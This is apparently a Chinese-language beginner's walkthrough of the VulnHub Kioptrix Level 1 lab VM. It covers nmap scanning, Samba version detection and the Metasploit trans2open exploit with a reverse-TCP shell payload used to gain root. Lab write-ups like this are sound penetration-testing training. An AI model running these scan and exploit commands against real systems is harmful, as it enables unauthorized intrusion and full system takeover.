简介： vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看，项目地址如下。
项目地址：Kioptrix: Level 1 (#1) ~ VulnHub

信息收集

查看本机IP，靶机跟kali都是使用NAT模式，所以看一下本机IP，扫一下IP段就可以看到靶机的IP了。

nmap扫描存活，因为我NAT设置的起点范围是100所以我扫的是100-254.

nmap -sn 192.168.2.100-254

因为我本机没开，192.168.2.100是kali的IP，所以192.168.2.122就是靶机IP了。
锁定靶机IP为192.168.2.122

接下来对192.168.2.122进行一个常用端口扫描。

nmap -sS -v- n 192.168.2.122

可以看到开放了22,80,111,139,443，1024等端口,我们访问80端口可以看到是apache的默认首页。

对网页进行目录扫描发下如下路径。

dirsearch.py -u http://192.168.2.122

好像没什么用，查看一下其他端口，以及服务的版本信息。

nmap -sS -sV 192.168.2.122

端口服务版本信息

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:0C:61:80 (VMware)

重点看一下samba服务，用msf查看一下samba的版本

msf6 > use auxiliary/scanner/smb/smb_version 
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.2.122
rhosts => 192.168.2.122
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.2.122:139     - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.2.122:139     -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.2.122:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > 

samba版本信息：Samba 2.2.1a
利用searchsploit Samba 2.2.1a 查看相关版本的samba是否存在漏洞。运气很好，有几个。我们使用msf试一下第一个。

msf6 auxiliary(scanner/smb/smb_version) > search trans2open

set rhosts 192.168.2.122                  # 设置目标
set payload linux/x86/shell_reverse_tcp   # 设置payload
run

成功获取root权限。Kioptrix-level-1这个靶场对新手来说还是挺友好的。初学者可以做做试试看。